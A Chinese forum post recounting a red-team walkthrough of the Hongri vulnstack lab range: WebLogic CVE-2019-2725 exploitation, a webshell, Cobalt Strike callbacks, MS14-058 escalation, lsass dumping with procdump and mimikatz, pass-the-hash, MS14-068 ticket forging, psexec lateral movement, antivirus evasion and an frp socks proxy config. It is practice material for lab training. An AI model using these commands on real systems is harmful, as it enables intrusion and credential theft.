论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
ToB企服应用市场:ToB评测及商务社交产业平台
»
论坛
›
安全
›
网络安全
›
红日靶场(二)ATT&CK红队评估第一次打+复盘总结 ...
红日靶场(二)ATT&CK红队评估第一次打+复盘总结
傲渊山岳
金牌会员
|
2022-9-16 17:21:26
|
显示全部楼层
|
阅读模式
楼主
主题
831
|
帖子
831
|
积分
2493
下载地址:
http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
环境配置:
web靶机需要恢复到快照3,然后登陆时切换用户为:WEB\de1ay 密码:1qaz@WSX,这样后续还有提权步骤,进入目录C:\Oracle\Middleware\user_projects\domains\base_domain,运行startweblogic服务
然后我将虚拟机nat网段设置成了和web靶机一样的192.168.111.0/24,然后让web靶机改为自动获取ip,就可以出网了
配置信息:
DC
IP:10.10.10.10 OS:Windows 2012(64)
应用:AD域
WEB
IP1:10.10.10.80 IP2:192.168.111.4 OS:Windows 2008(64)
应用:Weblogic 10.3.6MSSQL 2008
PC
IP1:10.10.10.201 IP2:192.168.111.5 OS:Windows 7(32)
复制代码
1.web外网打点
直接pingweb主机发现ping不同,可能是防火墙的问题,nmap用SYN做全端口扫描nmap -sS -Pn -p1-65535 192.168.111.4 Pn为不发送icmp包
逐一尝试每个端口,最后在7001端口发现有内容,扫描一下路径
看一下login这个路径,发现是WebLogic Server 版本: 10.3.6.0
直接搜索一下该版本漏洞,发现存在CVE-2019-2725,本来想直接msf用这个CVE去打,但是发现有360
然后在网上找了个可以利用这个CVE的工具,下载地址:
https://github.com/shack2/javaserializetools
然后上传了个冰蝎自带的jsp木马
然后冰蝎成功上线
然后CS设置好监听后直接弹给CS,但是360又给干碎了
这里试了很久,要么就是被360拦截,要么就是无法联动,tnnd,直接物理黑客把360关了(主要是我的虚拟机出忘了,360自动更新了,太菜了shellcode免杀技术不过关)
然后派生给cs,cs成功上线
提权直接使用MS14-058提权,我通过msf直接提不成功,用的以下工具:
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-058
发现可以提权后,用cs生成一段powershell上线脚本,然后运行Win64.exe "powershell脚本内容",这样就可以上线cs啦
上线后再派生到msf方便结合进行内网信息收集,这里也可以再多进行下权限维护
2.内网信息收集
CS获取凭据信息
msf查看下域控、域成员等
msf自动建立并查看路由
利用web靶机作为跳板,用msf对内网实时扫描探测,发现了内网主机ip(前面已经知道了10.10.10.10是域控,接下来对域控进行探测)
使用nmap挂上代理对其进行扫描(有点慢)
或者直接使用cs来扫描也是一样的portscan 10.10.10.0/24,内网存活主机探测加端口扫描
扫描结果就是都开启了445和3389
3.域横向
先用永恒之蓝试试域控呢过不能拿下,msf扫描一下看是否存在漏洞,结果显示存在
但是问题是一直没有会话返回,没办法换条路走,用psexec.exe来实现域横向,这里因为是win server 2008的缘故,正好是可以直接抓到明文密码的,直接拿抓到的明文密码试一试(后面都没图了,忘了截)
上传psexec.exe到web靶机,然后因为DC靶机开启了139,445端口,尝试在web靶机上IPC$连一下DC,发现可以连接成功
这时使用psexec获取到DC的system权限就好了
PsExec.exe -accepteula \\DC -s cmd.exe
接下来就需要让DC上线CS,方便后续操作,通过web靶机在cs设置一个中转监听,然后生成该监听器的payload
将payload上传到web靶机,在通过IPC$共享复制到DC靶机上
system权限运行,CS成功上线DC域控靶机,然后我可以用打域控同样的方式拿下PC靶机
3.其他方式的内网渗透
因为上面的内网渗透方式是直接打的,有许多不足,后面复盘的时候有尝试勒几种不同的方式,不过因为没截图,所以接来下就都用文字说明了~
杀软的问题
上面我是直接手动把杀软关了,后面发现除了做免杀还是有办法的(主要做了好久发现还是过不了360,太菜了)
获取webshell后上传MS14-058.exe的提权工具(我做了简单的免杀后这个没有被360杀掉,msf的shellcode是怎么都被杀),然后上传procdump.exe,用该提权工具以system权限运行procdump.exe -accepteula -ma lsass.exe lsass.dmp导出lsass信息,然后下载到本地,用mimikatz离线获取到管理员明文密码(其实这么简单的密码NTLM Hash爆破也出来了)
有了明文密码之后,因为第一次扫描就发现开了3389,直接3389登录管理员身份远程桌面,手动关掉杀软就行,PC靶机也可使用此方式,不过要先搭建socks代理用web靶机将流量转发出来才可以连接到PC的RDP
ps:这里我后续还测试了msf的killav以及强制taskkill /PID /F等,都是关不掉的,只能手动点击关闭,或者师傅们有别的办法可以传授我~
域横向的其他方法
之前我是直接用psexec.exe通过明文密码的方式横向移动的,但是psexec这个工具并不好,会产生大量日志
这里我们用wmic.py工具先进行PTH攻击,然后用ipc$的方式连接域控,上传shellcode(因为域控没有杀软),或者是
或者我们可以用PTT的方式,利用ms14-068漏洞,执行下面命令获得可以访问域控的票据,再把票据注入内存
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码
ps:这里顺便想说一下我在域内比如要用impacket包里的python脚本工具怎么办,比如wmic.py,因为想web靶机没有Python环境,只能将流量代理出来,cs的socks4a速度慢得很,msf的socks代理我感觉总是有有问题,所以还是自己上传frp或ew这种手动建立socks5要快一些
我一般使用frp,frp建立socks5代理只需要修改frpc.ini即可(新get到的,之前都是用ew)
frpc.ini配置:
[common]
server_addr = 服务器IP
server_port = 7778
[sock5]
type = tcp
remote_port =8111
plugin = socks5
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
傲渊山岳
金牌会员
这个人很懒什么都没写!
楼主热帖
2022你不容错过的软件测试项目实战(we ...
MySQL max() min() 函数取值错误
SQL Server创建表
MySQL数据库-数据表
Swift之Codable自定义解析将任意数据类 ...
2022年春节后这波疫情对于国内SAP咨询 ...
K8S 性能优化 - K8S APIServer 调优 ...
Java面向对象--接口和多态
变量的定义和使用
【云原生】Docker的安装与使用(适用于 ...
标签云
挺好的
服务器
快速回复
返回顶部
返回列表